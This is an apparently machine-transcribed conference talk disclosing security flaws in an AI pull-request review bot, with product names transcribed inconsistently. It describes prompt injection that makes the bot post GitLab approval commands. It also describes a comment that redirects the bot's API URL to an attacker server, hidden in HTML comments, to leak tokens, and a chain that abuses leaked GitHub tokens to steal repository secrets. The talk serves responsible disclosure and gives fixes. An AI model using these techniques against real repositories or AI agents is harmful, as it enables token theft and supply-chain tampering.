Sweet, sweet temptation of AI. As a developer, it's fantastic to have those tools for Git commits. And yeah, it's tempting. But is it secure? Is it safe? Is it always doing the things we want, we anticipate, we want it to do? This question, Niels is going to answer to us. Niels comes from Switzerland, and he works in the field of ITSec, and he is an advocate of open source tools and an advocate of Linux, and it is his first time being on the Congress, and it is his first talk on the Congress. So a very special, very decent, loud, amazing applause for Niels.
Thank you very much. Thank you for the introduction. So hello everyone, and thank you for joining so early in the morning. I hope you had some sleep last night. So this talk is called AI meets Git, Unmasking Security Flaws in Codal Merge. So my name is Niels Amier. I'm a security researcher, and I think I got introduced pretty well already, so I will skip this. So basically, this talk is going to be a story of an open source tool, and we'll see how we can exploit it to get privilege escalation on GitLab through quick actions, how we can leak tokens and get write access to GitHub repositories, and how we can then do lateral moves to leak GitHub repository secrets. We'll also see how these issues can be fixed, so solutions to that, and what actions the vendor took, or the lack of actions, maybe. So let's get right in. So as you know, everyone is talking about AI these days, and developers are no exception to that. And when a developer hears about a cool new tool that uses AI, they are very likely to start using it for their open source projects, right? But if that tool has security vulnerabilities in it, the consequences can be quite catastrophic. Yet everyone wants to use AI because it's cool, it's trendy, so they may overlook the security of things just for the sake of using AI. And this is precisely what's happening with Codal Merge. So Codal Merge is an open source tool developed by Codal, and it can help developers review and handle Git pull requests. And to do that, it uses LLMs. So that tool supports multiple Git providers, such as GitHub, GitLab, Bitbucket, and it's getting adopted by more and more open source projects, including very popular ones. So how do you use it? So here we have a really simple example. So we take GitHub, for example. So we have a pull request, which is very simple. It just modifies the README file and adds a usage section to that file. So if you have a GitHub repository where you have installed and set up Codal Merge, let's say through GitHub Actions, for example, you can write a comment on that merge that pull request that says slash ask and then some question, like, what is this about? And Codal Merge is going to interpret that and reply with an answer that is supposedly useful to the developer, like, okay, this PR is about adding a new section to the README file. It actually tells how to run the project using Poetry Run Start. So we've seen the ask command, but Codal Merge interprets multiple commands that it supports. And all of these commands start with the slash, but you can also do like slash improve, and Codal Merge is going to suggest changes to the code automatically, make a review, like, is there problems in the code, automatically update the changelog file, and so on and so on. So there are multiple ways you can install and run it. The easiest one is if you use GitHub is through GitHub Actions, but you can also run that as a GitHub app. If you use GitLab, that can run through the CI/CD pipeline. Or if you want, you can also set up a GitLab webhook, which you can set up to basically call your own instance of CodeEmerge that you run on your own server. You can also run it locally and tell it to connect to a GitLab, GitHub instance, and so on. Now for configuration, because CodeEmerge needs to basically access the pull requests and the comments, you will need to provide access tokens or API keys to your GitHub or GitLab project. And for the LLM service, you also need to provide an API key there, such as if you use OpenAI, for example. So the way it works is quite simple, right? So when you post a comment, basically the Git provider is going to notify CodeEmerge somehow. So that depends on what installation method you use. But if you use a GitHub action, it's going to run a GitHub action. And CodeEmerge is going to run in there. It's going to see that there was a new comment that was posted and determine that that was an ask command, extract the question, which is after slash ask. It's going to generate a prompt, send that prompt to the LLM service, get a response from the LLM service, generate a response comment based on a template and that response from the LLM service, and post back a new comment as a response. And then the user can read that comment. So pretty simple. So the question I asked myself was, how is that prompt built? So there are actually two parts there, the system prompt and the user prompt. So let's have a look at these. The system prompt is a static piece of text. There's no input there. So it basically tells the LLM that its goal is to answer questions, and it must do its best to answer the user's questions. And it's just static, so there's not much we can manipulate here. So let's have a look at the user prompt now. The user prompt is built using a template, and notably, at the bottom right, there's that orange piece where it says questions. So that's going to get replaced with the question the user put in the comment. So that means when you write the comment like this, what is this about? The user prompt, the final one, will end up being like this, with the orange parts replaced. So what that means is the user input gets directly inserted into the user prompt. And therefore, we have direct control over the prompt, right? So what could go wrong? So this is typically the case of a prompt injection attack. So it's very easy to trick the LLM into not answering the user question, but writing arbitrary text. So here we simply tell it to write, "I love mermaids." And in the comment, we see that we easily manage to get CodeEmerge to write a comment that says, "I love mermaids." So we can control what it posts, basically. So yeah, cool mermaids. So nothing serious so far, right? We just got it to put arbitrary text. But it turns out GitLab has a feature called Quick Actions. So Quick Actions are basically a way to run actions on GitLab by posting a comment. So kind of the same way CodeEmerge works, right? So you see where this is going. So just as an example, if you start writing a comment on a GitLab merge request and you type slash, you will get this auto-completion and it will list all of the quick actions you can do. And one example of that is slash title. So that is used to change the title of the merge request. So if you type such a comment and you click the comment button, what you will get is your comment is going to be posted. But at the same time, since it contains a quick action, that quick action is going to get executed by GitLab, and it will effectively change the title of the merge request. And there are many quick actions, but some notable ones include slash approve to approve a merge request, slash close to close it, slash merge to merge a merge request. You can change the target Git branch for that merge request and change the title as we've seen. So yeah, you see where this is going. So instead of telling Kodo Merge to write I love mermaids, you can tell it to write slash approve. And then it's going to post a comment that contains slash approve. And at the bottom, you see that GitLab actually executes that and approves the merge request, even if you don't have the necessary permissions. So basically, here as a user, I was a reporter. So it's basically the minimum permissions you need to post a comment. But Kodo Merge uses a token which has maintainer role, which includes, which lets it do more stuff. So you basically get privilege escalation through quick actions. So I mentioned approve and merge. So the, on GitLab, these are two different things, right? So if you have a merge request, on the merge request page, you will see two buttons, an approve button and a merge button. So approve does not merge the merge request, it just gives an approval. And GitLab projects can be configured to only allow merging when there are at least a specific number of approvals that have been given. So basically, doing that trick is going to give you an extra approval you're not supposed to get. For slash merge through quick action, this is actually a special quick action on GitLab. And as a user, you never see this because when you type the comment, this is all hidden. It's in the web page. But Kodo Merge uses the GitLab API to post the token. And the API requires an extra argument to be passed for that quick action to successfully run. And that extra argument is just a Git commit hash. The problem is that through Kodo Merge, we only control the comment argument, and we cannot add or modify other arguments. So you can, unfortunately, you cannot do slash merge. So that one is not working. However, you can do all the rest. So you could approve, you could basically cause some chaos on a GitLab project, like rename all of the merge requests, close all of them, and make the developers lose a lot of time, basically. So we were pretty close to a catastrophe here, and I thought if there is something like this, there must be more to be found, right? And I had a look at one thing that Kodo Merge does, and that is the way it builds its configuration internal object. So basically, it's going to read configuration from local files and from environment variables, different places. And these files include a configuration file, a secrets file that contains the API keys, and so on. And if you use that on GitLab or on GitHub, it will also load a special file, pragent.toml, that you can put at the root of the repository, and it will read the config from there. So here is an example of what you would find in that configuration file. So if you use GitLab, this is where you say, here's my GitLab instance. So if you use gitlab.com, fine, just use the default gitlab.com, but maybe you have, I don't know, your own GitLab instance, so you may want to change the URL there. And the personal access token to actually talk to GitLab, this is also where you put it. For GitHub, same. So most people use github.com, but maybe some people use a GitHub Enterprise on-premise instance of GitHub. So this is where you would change the URL to your own instance of GitHub. Same for the LLM provider. So you put your API key there and different settings. So when I was playing with some of the commands, I just tried slash update changelog, which is one of the CodeOmerge commands, and I saw this response comment. And it basically told, oh, you can rerun the command and pass dash dash some key equals some value. And I was like, so what does that do actually? And actually, CodeOmerge allows overwriting the config options through comments. So if you type a comment that says slash some command minus minus some key equals some value, what this does behind the scenes is it first sets some key to value in the config and then runs some command. So it's the same as if you would put that piece in the config file. So this is fine, and it's useful, because you may want to pass some options. The problem is that it works with any configuration option, including the critical ones. So you can actually overwrite the GitHub URL, the GitLab URL, OpenAI service URL. And that means you can actually trick CodeOmerge into leaking API keys. So indeed, what you can do is host your malicious server, let's say at 1234, and overwrite the config option. And in the case of a GitHub deployment, you can tell CodeOmerge to not connect to api.github.com, but to 1234. And then you just look at the requests you receive there and extract the secret token from that request. And the same can be done for the OpenAI API key and the GitLab personal access token. So in practice, it's very easy. You write a comment like this, like some command, I just chose slash ask here, and then you pass, so here this is an example with GitLab, you would pass minus minus gitlab.url equals 1234. And optionally, so if you want to be stealthy, you can also add some HTML comments, and when the comment renders, nobody sees what you've done, and only the left part of the comment will appear, but the rest would still get interpreted by CodeOmerge. And then on your server at 1234, you just capture the traffic, and you would see that you receive an HTTP request, and in that request, in the authorization header, you get your leaked GitLab personal access token. And yeah, the same technique works for not just GitHub Actions, but you can also leak the GitHub app JWT token, OpenAI key, and so on. So basically, what's the impact of that? So if you leak an OpenAI API key, well, you get free access to the OpenAI API. Someone else pays the bill. GitLab personal access token, well, depends what permissions you have, but you with that token, but you may be able to do stuff you're not supposed to do on that GitLab instance. And in the case of GitHub, so if that runs in a GitHub action, what you get is an ephemeral GitHub token. So let's see in more detail what this is. So if you have a look at the CodeOmerge official documentation and you go to the installation section of the docs, first thing you see is run through GitHub Actions. And they suggest this piece of text that you can copy and paste to a file in .github/workflows/some YAML file in your GitHub repository. So this is a GitHub action. And you see at the bottom where there is the arrow, it uses a secret called GitHub token. So if you've used GitHub secrets before with a repository, this is not a normal secret. It's actually a secret that is automatically generated when the GitHub action starts. And that secret is a GitHub API token, so a token you can use to do stuff on the API and authenticate with that token. But that token expires as soon as the GitHub action ends. or after 24 hours in case you have an action that runs for a very long time. That token comes with some permissions. Problem is, since it expires immediately after the action ends, you need some way to use it, right? If it expires, you cannot use it anymore. So what you can do is use it while it's still hot, while it's still valid. And basically, if you do the trick I talked before, the CodeEmerge GitHub action is going to make a request to my malicious server at 1234, and it's going to wait for a response from my malicious server. And this is our chance. So while it waits for the response, the action is still running. So the token is still valid. So this is where you need to immediately use the token and authenticate to the GitHub API and do stuff with it. So if we look back at that example from the docs, you see there's a permissions block here. And they suggest you give write permissions to the issues, write permissions to pull requests. So basically you can modify issues, modify pull requests. They also give write permissions to contents. What does that mean? So if you've got contents write permission, what this gives you is actually write access to the Git repository itself. So you can push Git commits, push Git tags, modify the Git history, basically. There's just one exception. You cannot modify things in the .github/workflows folder, because for that you need an extra permission, because that folder contains the GitHub action files themselves. You need workflow write permission for that. Another thing you can do with contents write is update and delete GitHub releases. So many GitHub projects use GitHub releases to tell users they've made a new release. And with these releases, they have sometimes assets, so downloadable files. So here we have an example. That's the OpenMS C++ library that was using CodeEmerge. And when they make a new release, they provide an executable files that users can download and install the library. So you could replace those executables and serve malware, for example, directly from the official GitHub project. So some people may think, well, maybe this is too many permissions. What if I remove the permissions block? Just don't want to give any permissions. Well, you may actually make it even worse if you do that. Because basically what happens is if you don't specify the permissions block, you get the default permissions. And here there's an example of a project who was using CodeEmerge and who did that. And what you end up with is you get contents write, issues write, pull requests write, and a bunch of other write permissions that you didn't have before, including actions write. So you can even trigger action, GitHub actions with that. So how does it work exactly? So the default permissions, it's a setting on your GitHub project. But if you never changed that setting, like probably most people never change, if you've created your GitHub repository before 2023, you get the permissive settings by default, which basically means almost write permission for everything. If you've created the GitHub repository in 2023 or later, you get the more restricted set of permissions. So basically read-only for a few things. So this is much better. But there are really many projects that were created before 2023, many popular ones, so they still use the default permissive set of permissions. So make sure you check what settings you have and go to Project Settings, Actions, General, and choose the right option at the bottom here. So unless you have a really good reason to give write access to your GitHub tokens. So fine, we got write access to the Git repository. We can edit the releases, but the holy grail would be to actually be able to leak the GitHub secrets. So let's see how we can do that in some cases. So if the project uses GitHub Actions for CodeEmerge, it's likely to use GitHub Actions for other stuff too, right? The problem is if there's another action that uses a secret and you want to leak that secret, you need first some way to trigger that action, and then you need some way to modify that action so that it actually leaks the secret to you. Problem is, let's say you have write access to the repository, we already have contents, right? But you cannot trigger that action, so too bad, right? But there are actually ways we can do that. So on the right, you have an example here. Basically, if you have a GitHub action file that contains on workflow dispatch, so it means it runs when there's a workflow dispatch event that was sent. This is something that you see quite often because developers are lazy and they want to have a button they can click to trigger an action. And to make that button appear, you need to put on workflow dispatch. So this is quite common. And the thing is, to send that workflow dispatch event through the API, you need actions write permission, such as we've seen before. If you remove the permissions block and you have the default permissions, you get actions write. So this is one way you can do it. The holy grail would be if you have workflow write. Basically, you could modify the action files themselves directly and do whatever you want, but this usually never happens. And finally, even if you don't have actions write, there are many projects that have GitHub actions that run automatically in some cases. Like, I've seen projects that do an automated release every week. So they would have something like on schedule, and there's a cron schedule that triggers the action automatically. So even if you only have contents write, what you could do is write something to the repository that modifies a file that the action uses. And usually actions do something like build the project. And usually the project code itself is not in the .github/workflows directory, right? It's at the root of the repository. And with contents write, you can modify that. So you would just modify that right before the cron schedule runs, and you can do a coordinated action to leak the token. So here is a use case. That's from the Laos blockchain project. So they have, they tick all the boxes, right? So they use Codo Merge. They have contents write and actions write because they removed the permissions block. And they have another GitHub action that runs on workflow dispatch. And then that action does two things. It executes a file, setup.py, and then it connects to Docker Hub. It logs into Docker Hub. And to do that, it uses secrets. So we want to leak these secrets, right? The username and the token. So it's let's see how we can do that. So basically what you do is you write a PR comment on that project, and you make sure you pass --github.baseurl=1234, like we've seen before. But before you do that, on your malicious server at 1234, you have to run two things. You run a meetup dump instance that is going to dump the HTTPS traffic. And for that, when you run it the first time, it generates a certificate, a TLS certificate. Second thing you have to run is another HTTP server that listens to HTTP requests. And when it gets a request, it basically extracts the GitHub token from the request and immediately uses it while it's still valid to do two things. First, it pushes a Git commit to the repository, and that Git commit modifies the setup.py file that we are going to run in the second action, and it modifies it in a way so that when it runs, it installs our malicious server's TLS certificate, and it modifies the etc hosts file so that when we connect with Docker login to docker.io, docker.io actually resolves to our server at 1234, so that you don't get like incorrect certificate in the HTTPS connection. And second thing it does is it sends a workflow dispatch event, because we have actions write permission, to trigger the second GitHub action, the one that's going to do Docker login and run the setup.py file. And then you can just drink your coffee and wait for Docker login to connect to your server and log the credentials, and you get the Docker Hub credentials that way. So for the example, so we had a Python file, setup.py, but there are projects in many different languages, and most build tools have like a code execution at build time feature. So another example would be if you have a Rust project, you could easily add a build.rs file, and when you do cargo build, this will actually execute build.rs. So you could do the same thing on different types of projects. So this POC has been tested, and it works with basically all versions of CodeEmerge, including the latest one, except for V024. I will talk about that later. So just same thing, but as a summary and visually, we just run two different actions. So the first one is going to connect to our malicious server, extract the token, overwrite the file, trigger the second action. Then the second action runs. It runs the modified file, does Docker login, connects to our server, and this is where we collect the credentials. So there are many affected GitHub repositories. This list is just a sample. So if you do a GitHub search, code search, you can easily find repositories that have a YAML file that uses CodeEmerge. And I've seen repositories like Tick, Nhost, the Firebase alternative, Vulnerable, the AutoWare project, so it's an autonomous driving project, Semantic Router, the OpenMS C++ library we've seen before. There was even a repository from the US government, from the CDC, the Center for Diseases and Control Prevention, that uses it and that is vulnerable to that. I found two blockchains, Stratus and Laos, we've seen, and many, many more. There are like hundreds using it. And so this is mostly about projects, GitHub projects using CodeEmerge through GitHub Actions, but there are also projects that use it through GitHub App or that use it on GitLab and so on. So these are affected to a lesser extent, but that includes also big projects like AutoGPT, which has like a bunch of stars. That one, for example, you could like rename all of the pull requests, all of the issues, close them, like make them lose tons of time. And basically that list grows every day, and people just start using CodeEmerge because it's cool, and they copy and paste that block from the documentation, and the combination of the vulnerability plus too many permissions makes it really bad. So we've seen these two problems. How do we fix them? So the first problem, remember, it was privilege escalation on GitLab through quick actions. So the developers can really easily fix it. Basically, if the response comment contains a quick action, don't post the comment. It's a very easy fix. As a user, just give the very minimum permissions to the token you use. The only thing you need to do, basically, is to be able to write a comment. And that's it. You don't need to do more than that. And as an extra layer of security, what you could do is use an LLM guardrail proxy server and basically block responses if you detect that they contain a GitLab quick action in the response. The second issue, which was write access to GitHub repositories. So as a developer of CodeEmerge, basically what you could do is only allow overwriting the config options if they are not a critical one. And as a user, make sure that you only give the necessary permissions. So don't give content rights. contents right to your GitHub token if you don't need it. And also make sure that you set the right default permissions on your GitHub repository. So don't give right to everything. And so just a fun fact, there's also something else I noticed in the documentation of CodeEmerge. So they fixed this, but before they were suggesting, if you want to use a specific version of CodeEmerge, you can pin the version. So you could say in your GitHub action file, use CodeEmerge version 0.24. But this has never worked. So if you put this, you basically use the latest version. So if you are using this and you think you're using a specific version, think twice. Make sure you use the version at the bottom which actually pins to the right version. So I contacted the vendor, Codeium AI, in July this year. They have an official website, so I used the contact us form, never got a reply. So then I checked what other options I had. So they have an official Discord server. I joined that, contacted one of the main developers, and said, hey, I have found stuff, security issues, how can I tell you that? And they told me, please write an email to that person. He's the responsible for security. So I did that, sent an email, sent all the details, never got a reply. I sent a second email, no reply. I got back to the guy who first told me to send the email. He ignored me. Then I checked the website, like I see who are we, like a team page. I see that there were two co-founders. So I also told the two co-founders about that. I was ghosted. So in August, I published a blog post, revealed it. And then in September, the company changed its name from Codeium AI to Codeo. And they changed the product name from PR Agent to CodeEmerge. Maybe they should have done something else instead. In November, the two issues have been assigned CVE numbers. And like 2 weeks ago, since it was still not fixed and I wanted to do my best, I contacted some of the top GitHub repositories that were affected. And three of them replied and fixed the issue really quickly. So shout out to them. And but most of them actually never even replied. So some of that is still not patched. And today, here I am. I think the situation is not really fixed, or not fixed at all. So some takeaways. Well, don't use the latest AI tool because it's cool. It may seem like a small change, you know, something that could help you, but actually, just adding a tool can have catastrophic consequences. And even the official documentation of such a tool can contain bad advice, so be careful of what you copy and paste. Make sure you understand what it does. Make sure you check your default permissions. Make sure you only give the necessary permissions to your GitHub tokens. And check your GitLab permissions. Also, if you use CodeEmerge with GitLab, only give the minimum permissions. And as a vendor or developer, you should really have a way for security people to contact you. So this is really important. And it's not just the vendor, but also the affected GitHub projects. Like I contacted like 8 of them and only 3 replied. So it's really still a problem these days. And yeah, changing your company and product name is not a valid patching strategy. So for more details, you can have a look at the blog post I wrote in August. It contains the full proof of concept code. And yeah, thank you.
Oh, sweet, sweet, stare into the fires of hell. Thank you very much for this pessimistic and sad talk, but thank you for bringing it up, talking about it, and time's up. I'm sorry, but you know how to reach him. Otherwise, have a wonderful Congress. Take out all your belongings. Forget nothing and no one and no empty bottles and you so on. You know the drill. Have a fantastic time.